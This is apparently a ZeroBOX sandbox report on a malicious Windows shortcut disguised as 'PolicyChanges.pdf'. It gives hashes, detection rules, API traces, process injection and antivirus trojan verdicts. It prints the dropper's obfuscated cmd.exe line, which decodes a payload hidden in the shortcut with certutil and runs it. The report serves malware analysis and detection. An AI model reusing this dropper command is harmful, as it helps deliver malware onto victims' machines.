Summary | ZeroBOX

PolicyChanges.pdf.lnk

Suspicious_Script_Bin Hide_EXE Generic Malware Malicious Library Malicious Packer Downloader UPX HTTP DNS ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges Code injection PWS Sniff Audio Steal credential
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 18, 2023, 6:01 p.m. Aug. 18, 2023, 6:03 p.m.
Size 2.5MB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Thu Jul 21 08:25:18 2022, mtime=Wed Aug 9 05:40:59 2023, atime=Thu Jul 21 08:25:18 2022, length=236544, window=hide
MD5 60696fce8c5e2d338afd213a0147d63b
SHA256 9cb4b2cf3e42dea7bc36e8cfb1ac51545afffff6b263bd2dd45c87220fe45436
CRC32 0B5648A6
ssdeep 24576:2YB+BeyW8nYzN/asAZHI6job+3E0xSaC54k98gi5xzL0tBTTiL1w3AqUsS9nummC:26fvh4x2TN48s
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Generic_Malware_Zero - Generic Malware

IP Address Status Action
142.250.207.67 Active Moloch
142.251.130.10 Active Moloch
164.124.101.2 Active Moloch
172.217.27.35 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: [!] Endpoint is not domain joined.
console_handle: 0x0000000000000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2868
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d62000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\ctnycgb.pdf
file C:\Users\test22\AppData\Local\Temp\PolicyChanges.pdf.lnk
cmdline "C:\Windows\System32\cmd.exe" /v /c set "k=%cd%\PolicyChanges.pdf.lnk"&set f=r&set "o=C:\Users\test22\AppData\Local"&>nul ce!f!tutil -decode "!k!" !o!\buns.t&ren "!o!\buns.t" buns.cmD&!o!\buns
Avast LNK:Agent-HC [Trj]
Rising Trojan.DocStarter/LNK!1.BB5F (CLASSIC)
TrendMicro HEUR_LNKEXEC.A
Sophos Troj/LnkDrop-C
Google Detected
VBA32 Trojan.Link.Crafted
Zoner Probably Heur.LNKScript
AVG LNK:Agent-HC [Trj]
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communications over P2P network rule Network_P2P_Win
description Communication using DGA rule Network_DGA
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Escalate priviledges rule Escalate_priviledges
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Take ScreenShot rule ScreenShot
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
Process injection Process 2556 resumed a thread in remote process 2668
Process injection Process 2668 resumed a thread in remote process 2912
Process injection Process 2668 resumed a thread in remote process 3068
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2668
1 0 0

NtResumeThread

thread_handle: 0x0000008c
suspend_count: 0
process_identifier: 2912
1 0 0

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 3068
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2052
thread_handle: 0x00000084
process_identifier: 3068
current_directory:
filepath: C:\Windows\System32\explorer.exe
track: 1
command_line: explorer.exe "C:\Users\test22\AppData\Local\Temp\ctnycgb.pdf"
filepath_r: C:\Windows\system32\explorer.exe
stack_pivoted: 0
creation_flags: 525824 (CREATE_NEW_PROCESS_GROUP|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0